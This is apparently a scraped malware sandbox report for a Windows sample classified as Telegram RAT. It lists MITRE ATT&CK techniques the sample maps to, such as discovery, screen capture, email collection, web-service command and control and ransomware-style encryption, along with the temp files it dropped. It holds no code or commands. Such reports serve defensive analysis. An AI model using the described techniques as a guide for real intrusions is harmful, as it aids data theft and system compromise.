Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report B5U2ccQ8H1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B5U2ccQ8H1.exe.log

C:\Users\user\AppData\Local\Temp\places.raw

C:\Users\user\AppData\Local\Temp\tmp1675.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp294C.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp3C90.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp4DF1.tmp.dat

C:\Users\user\AppData\Local\Temp\tmp7691.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpA393.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpA394.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpBACF.tmp.dat

C:\Users\user\AppData\Local\Temp\tmpBFF4.tmp.dat

Windows Analysis Report
B5U2ccQ8H1.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre